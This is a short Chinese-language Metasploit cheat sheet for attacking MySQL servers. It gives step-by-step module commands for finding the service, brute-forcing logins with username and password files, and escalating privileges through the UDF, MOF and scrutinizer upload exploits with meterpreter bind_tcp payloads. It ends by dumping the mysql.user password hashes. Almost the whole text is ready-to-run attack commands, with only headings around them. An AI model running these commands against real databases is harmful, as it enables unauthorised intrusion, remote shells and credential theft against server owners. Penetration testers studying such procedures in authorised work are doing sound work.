metasploit-mysql
对MYSQL进行渗透,这里分为两种情况,第一种MYSQL暴露在外网,第二种内网环境中的MYSQL服务,当然外网的MYSQL服务更易接触,更方便进行渗透测试,因此针对内网的MYSQL服务基本也适用于外网环境
探测MYSQL服务
- 通过nmap扫描3306端口,判断其是否开放
- 通过msf的auxiliary/scanner/mysql/mysql_version探测mysql服务
- 从web中寻找可能存在的MYSQL后台服务,如:phpMyAdmin
获取MYSQL口令
-
弱口令直接登录
-
暴力破解
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.2
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
set STOP_ON_SUCCESS true
set THREADS 20
exploit
MYSQL提权
udp提权
use exploit/multi/mysql/mysql_udf_payload
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set target 0
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
mof提权
use exploit/windows/mysql/mysql_mof
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
上传文件执行
use exploit/windows/mysql/scrutinizer_upload_exec
set RHOST 192.168.1.2
set USERNAME root
set PASSWORD 123456
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
获取mysql.user的hash
推荐使用SQL语句进行查询
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set THREADS 20
exploit